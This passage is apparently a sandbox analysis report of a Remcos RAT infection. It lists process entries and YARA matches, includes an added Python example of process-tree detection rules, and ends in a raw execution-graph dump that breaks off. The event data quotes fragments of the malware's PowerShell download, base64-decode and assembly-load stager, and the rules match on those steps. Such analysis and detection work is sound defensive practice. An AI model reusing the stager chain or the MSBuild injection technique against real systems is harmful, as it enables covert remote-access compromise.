                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:07:19:55
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs"
                                                                                              Imagebase:0xaa0000
                                                                                              File size:147'456 bytes
                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:07:20:07
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0x1c0000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:07:20:07
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0xab0000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Has exited:false
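The process entries above form a recognisable chain: wscript.exe running a script from C:\ProgramData and from the user's Temp folder, powershell.exe downloading data, base64-decoding it and loading it with Assembly.Load, and MSBuild.exe started with no project file by a non-developer parent, after which Remcos is found in MSBuild's memory. The following is an added example, not Joe Sandbox's or any Sigma rule's code: three detection rules encoding that chain, run over constructed process-creation events. The image paths and command lines are taken from the Target entries above; the parent_image values are an assumption about the tree (parent links are not shown in the entries), the PowerShell command line is shortened to the parts the rule inspects, and the devenv-spawned MSBuild event is a constructed benign control.

```python
"""Process-tree detection for the wscript -> powershell -> MSBuild chain.

Added example, not Joe Sandbox's or Sigma's code.  EVENTS are constructed
from the report's Target entries; parent_image values are assumed.
"""
import re

EVENTS = [
    {"target_id": 8, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\ProgramData\talpe.vbs",
     "parent_image": "wscript.exe"},                      # parent assumed
    {"target_id": 9, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # shortened to the fragments the rule keys on
     "cmdline": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command '
                 r'"$marmalady = $fishers.DownloadData($noninterest);'
                 r'$nonflavored = [System.Convert]::FromBase64String($backing);'
                 r'$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);"'),
     "parent_image": "wscript.exe"},                      # parent assumed
    {"target_id": 10, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "parent_image": "powershell.exe"},
    {"target_id": 11, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"',
     "parent_image": "powershell.exe"},                   # parent assumed
    {"target_id": 12, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"',
     "parent_image": "powershell.exe"},                   # parent assumed
    {"target_id": 13, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs"',
     "parent_image": "MSBuild.exe"},                      # parent assumed
    # constructed benign control: a developer build should not alert
    {"target_id": 100, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" C:\src\app.csproj /t:Build',
     "parent_image": "devenv.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELLS = {"powershell.exe", "pwsh.exe"}
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}
# script file executed out of a user-writable location
WRITABLE_SCRIPT = re.compile(
    r"\\(ProgramData|AppData\\Local\\Temp|Windows\\Temp|Users\\Public)\\[^\s\"']*"
    r"\.(vbs|vbe|js|jse|wsf|ps1|hta)\b", re.I)
PS_DOWNLOAD = re.compile(r"DownloadData|DownloadString|DownloadFile|Invoke-WebRequest", re.I)
PS_B64 = re.compile(r"FromBase64String", re.I)
PS_LOAD = re.compile(r"Reflection\.Assembly\]::Load", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline: str) -> str:
    """Everything after the (possibly quoted) image token, or '' if none."""
    cl = cmdline.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[end + 1:].strip() if end > 0 else ""
    parts = cl.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def detect(events):
    """Return (rule_name, target_id) pairs for every event matching a rule."""
    hits = []
    for ev in events:
        img = basename(ev["image"])
        cl = ev["cmdline"]
        parent = ev.get("parent_image", "").lower()
        if img in SCRIPT_HOSTS and WRITABLE_SCRIPT.search(cl):
            hits.append(("script_host_suspicious_path", ev["target_id"]))
        if img in POWERSHELLS and PS_DOWNLOAD.search(cl) and PS_B64.search(cl) \
                and PS_LOAD.search(cl):
            hits.append(("powershell_download_load_assembly", ev["target_id"]))
        # MSBuild with no project file and no build-tool parent is a hollowing host
        if img == "msbuild.exe" and not args_after_image(cl) and parent not in BUILD_PARENTS:
            hits.append(("msbuild_without_project", ev["target_id"]))
    return hits


if __name__ == "__main__":
    for rule, tid in detect(EVENTS):
        print(f"Target {tid}: {rule}")
```

The MSBuild rule deliberately keys on the absence of arguments rather than on the parent alone: a legitimate build always names a project or solution, whereas a process used purely as an injection target is started bare, as Target IDs 11, 12, 14 and 15 are here.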


                                                                                                Execution Graph

                                                                                                Execution Coverage:5.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:6%
                                                                                                Total number of Nodes:1791
                                                                                                Total number of Limit Nodes:72
                                                                                                execution_graph: node and edge listing from the interactive graph viewer, not reproduced here. API calls named in the graph: RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, GetLastError, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection (runtime); CryptAcquireContextA, CryptGenRandom, CryptReleaseContext (random number generation); WSAStartup, socket, connect, send, recv, WSAGetLastError (networking); CreateEventA, CreateEventW, CreateThread, WaitForSingleObject, SetEvent, CloseHandle (threading); GetLocalTime; GdiplusStartup, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipGetImageEncoders, GdipDisposeImage, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, BitBlt, GetIconInfo, DrawIcon, GetObjectA, GetDIBits, EnumDisplaySettingsW, LocalAlloc, GlobalAlloc, GlobalFree, DeleteDC, DeleteObject (consistent with screen capture).
46315->46306 46315->46309 46315->46310 46315->46311 46315->46312 46315->46313 46319 418754 46315->46319 46317->46298 46318->46293 46320 41876a 46319->46320 46351 403b60 46320->46351 46323 418816 46324 418876 46323->46324 46332 41881b 46323->46332 46325 4188da 46324->46325 46334 41887b 46324->46334 46326 41892b 46325->46326 46336 4188df 46325->46336 46327 418930 mouse_event 46326->46327 46343 418782 46326->46343 46330 4188d4 46327->46330 46329 4187bb 46354 418abe 9 API calls 46329->46354 46333 401eea 26 API calls 46330->46333 46331 417a88 95 API calls 46331->46330 46355 4185d7 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics MulDiv 46332->46355 46335 4189a0 46333->46335 46357 4185d7 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics MulDiv 46334->46357 46337 401eea 26 API calls 46335->46337 46359 4185d7 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics MulDiv 46336->46359 46341 4189a8 46337->46341 46341->46315 46342 418810 46342->46330 46343->46330 46343->46331 46344 41891b 46360 418a72 SendInput ___scrt_fastfail 46344->46360 46346 418864 46356 4189b0 SendInput ___scrt_fastfail 46346->46356 46348 4188c4 46358 418a11 SendInput ___scrt_fastfail 46348->46358 46361 403c30 46351->46361 46354->46342 46355->46346 46356->46342 46357->46348 46358->46330 46359->46344 46360->46342 46362 403c39 46361->46362 46365 403c59 46362->46365 46366 403c68 46365->46366 46367 4032a4 28 API calls 46366->46367 46368 403c74 46367->46368 46369 402325 28 API calls 46368->46369 46370 403b73 46369->46370 46370->46323 46370->46329 46370->46343 46372 401fbd 28 API calls 46371->46372 46373 414bbd SetEvent 46372->46373 46374 414bd2 46373->46374 46375 403b60 28 API calls 46374->46375 46376 414bec 46375->46376 46377 401fbd 28 API calls 46376->46377 46378 414bfc 46377->46378 46379 401fbd 28 API calls 46378->46379 46380 414c0e 46379->46380 46450 41afc3 46380->46450 46383 401d8c 26 API calls 46386 4161fb 46383->46386 46384 414d99 46447 414dad 
46384->46447 46449 414d8a 46384->46449 46385 414c37 GetTickCount 46387 41ad46 28 API calls 46385->46387 46388 401eea 26 API calls 46386->46388 46389 414c4d 46387->46389 46391 416207 46388->46391 46471 41aca0 46389->46471 46393 401eea 26 API calls 46391->46393 46395 416213 46393->46395 46394 414c54 46396 41ad46 28 API calls 46394->46396 46397 414c5f 46396->46397 46473 41ac52 46397->46473 46402 401d64 28 API calls 46403 414c89 46402->46403 46404 4027ec 28 API calls 46403->46404 46405 414c97 46404->46405 46406 40275c 28 API calls 46405->46406 46407 414ca6 46406->46407 46408 4027cb 28 API calls 46407->46408 46409 414cb5 46408->46409 46410 40275c 28 API calls 46409->46410 46411 414cc4 46410->46411 46412 4027cb 28 API calls 46411->46412 46413 414cd0 46412->46413 46414 40275c 28 API calls 46413->46414 46415 414cda 46414->46415 46416 404468 60 API calls 46415->46416 46417 414ce9 46416->46417 46418 401eea 26 API calls 46417->46418 46419 414cf2 46418->46419 46420 401eea 26 API calls 46419->46420 46421 414cfe 46420->46421 46422 401eea 26 API calls 46421->46422 46423 414d0a 46422->46423 46424 401eea 26 API calls 46423->46424 46425 414d16 46424->46425 46426 401eea 26 API calls 46425->46426 46427 414d22 46426->46427 46428 401eea 26 API calls 46427->46428 46429 414d2e 46428->46429 46430 401e13 26 API calls 46429->46430 46431 414d3a 46430->46431 46432 401eea 26 API calls 46431->46432 46433 414d43 46432->46433 46434 401eea 26 API calls 46433->46434 46435 414d4c 46434->46435 46436 401d64 28 API calls 46435->46436 46437 414d57 46436->46437 46438 43a5e7 42 API calls 46437->46438 46439 414d64 46438->46439 46440 414d69 46439->46440 46441 414d8f 46439->46441 46443 414d82 46440->46443 46444 414d77 46440->46444 46442 401d64 28 API calls 46441->46442 46442->46384 46483 404915 46443->46483 46482 4049ba 81 API calls 46444->46482 46498 404ab1 83 API calls 46447->46498 46448 414d7d 46448->46449 46449->46383 46470 41afd6 46450->46470 46451 41b046 46452 401eea 26 API calls 46451->46452 46453 
41b078 46452->46453 46455 401eea 26 API calls 46453->46455 46454 41b048 46458 403b60 28 API calls 46454->46458 46457 41b080 46455->46457 46456 403b60 28 API calls 46456->46470 46460 401eea 26 API calls 46457->46460 46459 41b054 46458->46459 46461 401eef 26 API calls 46459->46461 46463 414c17 46460->46463 46464 41b05d 46461->46464 46462 401eef 26 API calls 46462->46470 46463->46384 46463->46385 46463->46449 46465 401eea 26 API calls 46464->46465 46467 41b065 46465->46467 46466 401eea 26 API calls 46466->46470 46500 41bfa9 28 API calls 46467->46500 46470->46451 46470->46454 46470->46456 46470->46462 46470->46466 46499 41bfa9 28 API calls 46470->46499 46472 41acb6 GetTickCount 46471->46472 46472->46394 46474 436050 ___scrt_fastfail 46473->46474 46475 41ac71 GetForegroundWindow GetWindowTextW 46474->46475 46476 403b40 28 API calls 46475->46476 46477 414c6d 46476->46477 46478 41aec8 46477->46478 46479 41aed5 46478->46479 46480 401f86 28 API calls 46479->46480 46481 414c7b 46480->46481 46481->46402 46482->46448 46484 40492a 46483->46484 46485 4049b1 46483->46485 46486 404933 46484->46486 46487 404987 CreateEventA CreateThread 46484->46487 46488 404942 GetLocalTime 46484->46488 46485->46449 46486->46487 46487->46485 46502 404b1d 46487->46502 46489 41ad46 28 API calls 46488->46489 46490 40495b 46489->46490 46501 404c9e 28 API calls 46490->46501 46492 404968 46493 401f66 28 API calls 46492->46493 46494 404977 46493->46494 46495 41a686 79 API calls 46494->46495 46496 40497c 46495->46496 46497 401eea 26 API calls 46496->46497 46497->46487 46498->46448 46499->46470 46500->46451 46501->46492 46505 404b29 101 API calls 46502->46505 46504 404b26 46505->46504 46507 440c5d 46506->46507 46510 440a4d 46507->46510 46511 440a64 46510->46511 46514 41ad67 46511->46514 46516 445354 20 API calls __dosmaperr 46511->46516 46513 440a9b 46517 43a827 26 API calls _Deallocate 46513->46517 46514->46188 46516->46513 46517->46514 46521 402bee 46518->46521 46520 40263b 46520->45897 46522 402bfb 
46521->46522 46523 402c08 error_info_injector 46521->46523 46525 4015d8 26 API calls _Deallocate 46522->46525 46523->46520 46525->46523 46526->45902 46527->45904 46528 43a998 46530 43a9a4 _swprintf CallCatchBlock 46528->46530 46529 43a9b2 46546 445354 20 API calls __dosmaperr 46529->46546 46530->46529 46533 43a9dc 46530->46533 46532 43a9b7 46547 43a827 26 API calls _Deallocate 46532->46547 46541 444acc EnterCriticalSection 46533->46541 46536 43a9e7 46542 43aa88 46536->46542 46539 43a9c2 __wsopen_s 46541->46536 46543 43aa96 46542->46543 46545 43a9f2 46543->46545 46549 448416 39 API calls 2 library calls 46543->46549 46548 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46545->46548 46546->46532 46547->46539 46548->46539 46549->46543 46550 414dba 46565 41a51b 46550->46565 46552 414dc3 46553 401fbd 28 API calls 46552->46553 46554 414dd2 46553->46554 46555 404468 60 API calls 46554->46555 46556 414dde 46555->46556 46557 4161f2 46556->46557 46558 401eea 26 API calls 46556->46558 46559 401d8c 26 API calls 46557->46559 46558->46557 46560 4161fb 46559->46560 46561 401eea 26 API calls 46560->46561 46562 416207 46561->46562 46563 401eea 26 API calls 46562->46563 46564 416213 46563->46564 46566 41a529 46565->46566 46567 43a88c ___crtLCMapStringA 21 API calls 46566->46567 46568 41a533 InternetOpenW InternetOpenUrlW 46567->46568 46569 41a55c InternetReadFile 46568->46569 46573 41a57f 46569->46573 46570 41a5ac InternetCloseHandle InternetCloseHandle 46572 41a5be 46570->46572 46571 401f86 28 API calls 46571->46573 46572->46552 46573->46569 46573->46570 46573->46571 46574 401eea 26 API calls 46573->46574 46574->46573 46575 402bcc 46576 402bd7 46575->46576 46577 402bdf 46575->46577 46583 403315 46576->46583 46578 402beb 46577->46578 46592 4015d3 46577->46592 46584 4015d3 22 API calls 46583->46584 46585 40332a 46584->46585 46586 402bdd 46585->46586 46587 40333b 46585->46587 46602 43a7ac 26 API calls 3 library calls 46587->46602 46589 43a846 46603 43a854 11 API calls _Atexit 
46589->46603 46591 43a853 46594 43360d 46592->46594 46593 43a88c ___crtLCMapStringA 21 API calls 46593->46594 46594->46593 46595 402be9 46594->46595 46597 43362e std::_Facet_Register 46594->46597 46604 442200 7 API calls 2 library calls 46594->46604 46598 433dec std::_Facet_Register 46597->46598 46605 437bd7 RaiseException 46597->46605 46606 437bd7 RaiseException 46598->46606 46601 433e09 46602->46589 46603->46591 46604->46594 46605->46598 46606->46601 46607 415cbc 46608 401d64 28 API calls 46607->46608 46609 415cc7 46608->46609 46610 401d64 28 API calls 46609->46610 46611 415ce0 46610->46611 46612 401fbd 28 API calls 46611->46612 46613 415ceb 46612->46613 46622 416436 46613->46622 46616 401d8c 26 API calls 46617 4161fb 46616->46617 46618 401eea 26 API calls 46617->46618 46619 416207 46618->46619 46620 401eea 26 API calls 46619->46620 46621 416213 46620->46621 46623 41644c 46622->46623 46624 4165ee 46622->46624 46656 4040bb 46623->46656 46626 401eea 26 API calls 46624->46626 46628 415cfe 46626->46628 46628->46616 46629 40428c 96 API calls 46630 416468 46629->46630 46631 4165e0 46630->46631 46633 41aec8 28 API calls 46630->46633 46664 4048a6 98 API calls 46631->46664 46634 416482 46633->46634 46635 4027ec 28 API calls 46634->46635 46636 416493 46635->46636 46637 40275c 28 API calls 46636->46637 46638 41649d 46637->46638 46639 404468 60 API calls 46638->46639 46640 4164ae 46639->46640 46641 401eea 26 API calls 46640->46641 46642 4164b6 46641->46642 46643 401eea 26 API calls 46642->46643 46652 4164be 46643->46652 46646 401f86 28 API calls 46646->46652 46647 41ac52 30 API calls 46647->46652 46648 41aec8 28 API calls 46648->46652 46649 40275c 28 API calls 46649->46652 46650 404468 60 API calls 46650->46652 46651 401eea 26 API calls 46651->46652 46652->46646 46652->46647 46652->46648 46652->46649 46652->46650 46652->46651 46653 401e13 26 API calls 46652->46653 46654 4165d5 46652->46654 46660 41a90c GlobalMemoryStatusEx 46652->46660 46661 41a98a GetSystemTimes Sleep 
GetSystemTimes 46652->46661 46653->46652 46663 4047eb 98 API calls 46654->46663 46657 4040cb 46656->46657 46658 4040fa 46657->46658 46659 4041f1 3 API calls 46657->46659 46658->46629 46659->46658 46660->46652 46662 41a9cf __aulldiv 46661->46662 46662->46652 46663->46631 46665 4339be 46666 4339ca CallCatchBlock 46665->46666 46697 4336b3 46666->46697 46668 4339d1 46669 433b24 46668->46669 46672 4339fb 46668->46672 46997 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46669->46997 46671 433b2b 46998 4426be 28 API calls _Atexit 46671->46998 46683 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46672->46683 46991 4434d1 5 API calls ___crtLCMapStringA 46672->46991 46674 433b31 46999 442670 28 API calls _Atexit 46674->46999 46677 433a14 46679 433a1a 46677->46679 46992 443475 5 API calls ___crtLCMapStringA 46677->46992 46678 433b39 46681 433a9b 46708 433c5e 46681->46708 46683->46681 46993 43edf4 38 API calls 4 library calls 46683->46993 46691 433abd 46691->46671 46692 433ac1 46691->46692 46693 433aca 46692->46693 46995 442661 28 API calls _Atexit 46692->46995 46996 433842 13 API calls 2 library calls 46693->46996 46696 433ad2 46696->46679 46698 4336bc 46697->46698 47000 433e0a IsProcessorFeaturePresent 46698->47000 46700 4336c8 47001 4379ee 10 API calls 3 library calls 46700->47001 46702 4336cd 46707 4336d1 46702->46707 47002 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46702->47002 46704 4336da 46705 4336e8 46704->46705 47003 437a17 8 API calls 3 library calls 46704->47003 46705->46668 46707->46668 46709 436050 ___scrt_fastfail 46708->46709 46710 433c71 GetStartupInfoW 46709->46710 46711 433aa1 46710->46711 46712 443422 46711->46712 47004 44ddc9 46712->47004 46714 44342b 46715 433aaa 46714->46715 47008 44e0d3 38 API calls 46714->47008 46717 40d767 46715->46717 47010 41bce3 LoadLibraryA 
GetProcAddress 46717->47010 46719 40d783 GetModuleFileNameW 47015 40e168 46719->47015 46721 40d79f 46722 401fbd 28 API calls 46721->46722 46723 40d7ae 46722->46723 46724 401fbd 28 API calls 46723->46724 46725 40d7bd 46724->46725 46726 41afc3 28 API calls 46725->46726 46727 40d7c6 46726->46727 47030 40e8bd 46727->47030 46729 40d7cf 46730 401d8c 26 API calls 46729->46730 46731 40d7d8 46730->46731 46732 40d835 46731->46732 46733 40d7eb 46731->46733 46734 401d64 28 API calls 46732->46734 47221 40e986 90 API calls 46733->47221 46736 40d845 46734->46736 46739 401d64 28 API calls 46736->46739 46737 40d7fd 46738 401d64 28 API calls 46737->46738 46742 40d809 46738->46742 46740 40d864 46739->46740 46741 404cbf 28 API calls 46740->46741 46743 40d873 46741->46743 47222 40e937 68 API calls 46742->47222 46745 405ce6 28 API calls 46743->46745 46747 40d87f 46745->46747 46746 40d824 47223 40e155 68 API calls 46746->47223 46749 401eef 26 API calls 46747->46749 46750 40d88b 46749->46750 46751 401eea 26 API calls 46750->46751 46752 40d894 46751->46752 46754 401eea 26 API calls 46752->46754 46753 401eea 26 API calls 46755 40dc9f 46753->46755 46756 40d89d 46754->46756 46994 433c94 GetModuleHandleW 46755->46994 46757 401d64 28 API calls 46756->46757 46758 40d8a6 46757->46758 46759 401ebd 28 API calls 46758->46759 46760 40d8b1 46759->46760 46761 401d64 28 API calls 46760->46761 46762 40d8ca 46761->46762 46763 401d64 28 API calls 46762->46763 46765 40d8e5 46763->46765 46764 40d946 46767 401d64 28 API calls 46764->46767 46782 40e134 46764->46782 46765->46764 47224 4085b4 46765->47224 46772 40d95d 46767->46772 46768 40d912 46769 401eef 26 API calls 46768->46769 46770 40d91e 46769->46770 46773 401eea 26 API calls 46770->46773 46771 40d9a4 47034 40bed7 46771->47034 46772->46771 46778 4124b7 3 API calls 46772->46778 46774 40d927 46773->46774 47228 4124b7 RegOpenKeyExA 46774->47228 46776 40d9aa 46777 40d82d 46776->46777 47037 41a463 46776->47037 46777->46753 46783 40d988 46778->46783 46781 
40d9c5 46784 40da18 46781->46784 47054 40697b 46781->47054 47306 412902 30 API calls 46782->47306 46783->46771 47231 412902 30 API calls 46783->47231 46786 401d64 28 API calls 46784->46786 46789 40da21 46786->46789 46798 40da32 46789->46798 46799 40da2d 46789->46799 46791 40e14a 47307 4112b5 64 API calls ___scrt_fastfail 46791->47307 46793 40d9e4 47232 40699d 30 API calls 46793->47232 46794 40d9ee 46796 401d64 28 API calls 46794->46796 46806 40d9f7 46796->46806 46803 401d64 28 API calls 46798->46803 47235 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46799->47235 46800 40d9e9 47233 4064d0 97 API calls 46800->47233 46804 40da3b 46803->46804 47058 41ae08 46804->47058 46806->46784 46809 40da13 46806->46809 46807 40da46 46808 401e18 26 API calls 46807->46808 46810 40da51 46808->46810 47234 4064d0 97 API calls 46809->47234 46812 401e13 26 API calls 46810->46812 46813 40da5a 46812->46813 46814 401d64 28 API calls 46813->46814 46815 40da63 46814->46815 46816 401d64 28 API calls 46815->46816 46817 40da7d 46816->46817 46818 401d64 28 API calls 46817->46818 46819 40da97 46818->46819 46820 401d64 28 API calls 46819->46820 46822 40dab0 46820->46822 46821 40db1d 46823 40db2c 46821->46823 46830 40dcaa ___scrt_fastfail 46821->46830 46822->46821 46824 401d64 28 API calls 46822->46824 46825 40db35 46823->46825 46853 40dbb1 ___scrt_fastfail 46823->46853 46828 40dac5 _wcslen 46824->46828 46826 401d64 28 API calls 46825->46826 46827 40db3e 46826->46827 46829 401d64 28 API calls 46827->46829 46828->46821 46831 401d64 28 API calls 46828->46831 46832 40db50 46829->46832 47295 41265d RegOpenKeyExA 46830->47295 46833 40dae0 46831->46833 46835 401d64 28 API calls 46832->46835 46836 401d64 28 API calls 46833->46836 46837 40db62 46835->46837 46838 40daf5 46836->46838 46840 401d64 28 API calls 46837->46840 47236 40c89e 46838->47236 46839 40dcef 46841 401d64 28 API calls 46839->46841 46842 40db8b 46840->46842 46843 40dd16 46841->46843 46847 401d64 28 API calls 46842->46847 
46848 401f66 28 API calls 46843->46848 46846 401e18 26 API calls 46849 40db14 46846->46849 46850 40db9c 46847->46850 46851 40dd25 46848->46851 46852 401e13 26 API calls 46849->46852 47293 40bc67 45 API calls _wcslen 46850->47293 47072 4126d2 RegCreateKeyA 46851->47072 46852->46821 47062 4128a2 46853->47062 46857 40dc45 ctype 46862 401d64 28 API calls 46857->46862 46858 40dbac 46858->46853 46860 401d64 28 API calls 46861 40dd47 46860->46861 46864 43a5e7 42 API calls 46861->46864 46863 40dc5c 46862->46863 46863->46839 46867 40dc70 46863->46867 46865 40dd54 46864->46865 46866 40dd5e 46865->46866 46870 40dd81 46865->46870 47298 41beb0 86 API calls ___scrt_fastfail 46866->47298 46868 401d64 28 API calls 46867->46868 46871 40dc7e 46868->46871 46873 401f66 28 API calls 46870->46873 46874 41ae08 28 API calls 46871->46874 46872 40dd65 CreateThread 46872->46870 47641 41c96f 10 API calls 46872->47641 46875 40dd96 46873->46875 46876 40dc87 46874->46876 46877 401f66 28 API calls 46875->46877 47294 40e219 109 API calls 46876->47294 46880 40dda5 46877->46880 46879 40dc8c 46879->46839 46882 40dc93 46879->46882 46881 41a686 79 API calls 46880->46881 46883 40ddaa 46881->46883 46882->46777 46884 401d64 28 API calls 46883->46884 46885 40ddb6 46884->46885 46886 401d64 28 API calls 46885->46886 46887 40ddcb 46886->46887 46888 401d64 28 API calls 46887->46888 46889 40ddeb 46888->46889 46890 43a5e7 42 API calls 46889->46890 46891 40ddf8 46890->46891 46892 401d64 28 API calls 46891->46892 46893 40de03 46892->46893 46894 401d64 28 API calls 46893->46894 46895 40de14 46894->46895 46896 401d64 28 API calls 46895->46896 46897 40de29 46896->46897 46898 401d64 28 API calls 46897->46898 46899 40de3a 46898->46899 46900 40de41 StrToIntA 46899->46900 47078 409517 46900->47078 46903 401d64 28 API calls 46904 40de5c 46903->46904 46905 40dea1 46904->46905 46906 40de68 46904->46906 46909 401d64 28 API calls 46905->46909 47299 43360d 22 API calls 3 library calls 46906->47299 46908 40de71 46911 401d64 28 
API calls 46908->46911 46910 40deb1 46909->46910 46913 40def9 46910->46913 46914 40debd 46910->46914 46912 40de84 46911->46912 46915 40de8b CreateThread 46912->46915 46917 401d64 28 API calls 46913->46917 47300 43360d 22 API calls 3 library calls 46914->47300 46915->46905 47639 419128 102 API calls __EH_prolog 46915->47639 46919 40df02 46917->46919 46918 40dec6 46920 401d64 28 API calls 46918->46920 46922 40df6c 46919->46922 46923 40df0e 46919->46923 46921 40ded8 46920->46921 46925 40dedf CreateThread 46921->46925 46926 401d64 28 API calls 46922->46926 46924 401d64 28 API calls 46923->46924 46928 40df1e 46924->46928 46925->46913 47644 419128 102 API calls __EH_prolog 46925->47644 46927 40df75 46926->46927 46929 40df81 46927->46929 46930 40dfba 46927->46930 46931 401d64 28 API calls 46928->46931 46933 401d64 28 API calls 46929->46933 47103 41a7a2 GetComputerNameExW GetUserNameW 46930->47103 46934 40df33 46931->46934 46936 40df8a 46933->46936 47301 40c854 31 API calls 46934->47301 46941 401d64 28 API calls 46936->46941 46937 401e18 26 API calls 46938 40dfce 46937->46938 46940 401e13 26 API calls 46938->46940 46943 40dfd7 46940->46943 46944 40df9f 46941->46944 46942 40df46 46945 401e18 26 API calls 46942->46945 46946 40dfe0 SetProcessDEPPolicy 46943->46946 46947 40dfe3 CreateThread 46943->46947 46954 43a5e7 42 API calls 46944->46954 46948 40df52 46945->46948 46946->46947 46949 40e004 46947->46949 46950 40dff8 CreateThread 46947->46950 47612 40e54f 46947->47612 46951 401e13 26 API calls 46948->46951 46952 40e019 46949->46952 46953 40e00d CreateThread 46949->46953 46950->46949 47640 410f36 137 API calls 46950->47640 46955 40df5b CreateThread 46951->46955 46957 40e073 46952->46957 46959 401f66 28 API calls 46952->46959 46953->46952 47642 411524 38 API calls ___scrt_fastfail 46953->47642 46956 40dfac 46954->46956 46955->46922 47643 40196b 49 API calls 46955->47643 47302 40b95c 7 API calls 46956->47302 47114 41246e RegOpenKeyExA 46957->47114 46960 40e046 46959->46960 47303 
